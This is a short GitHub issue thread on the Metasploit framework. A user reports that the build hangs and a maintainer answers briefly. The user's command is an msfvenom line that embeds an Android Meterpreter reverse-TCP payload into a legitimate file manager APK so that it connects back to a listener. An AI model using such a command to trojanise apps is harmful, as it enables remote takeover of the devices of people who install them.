### ISSUE TITLE
Backdoring APK Files

### ISSUE THREAD

**Issue by NightRaidGamer** [rapid7/metasploit-framework#17958]
hello I would like to know what this is because it is not working when I use the command:
 
msfvenom -x filemanager.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 -o backdored.apk

Error: apktool not found. If it's not in your PATH, please add it.

so i do SET PATH=%PATH%;C:\apktool

and this time I don't have the apktool error but another message appears and nothing happens, it's infinite like that.

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload

**Comment by bcoles** [comment]
https://github.com/rapid7/metasploit-payloads/issues/543#issuecomment-1053446012

**Comment by bcoles** [comment]
I have no idea
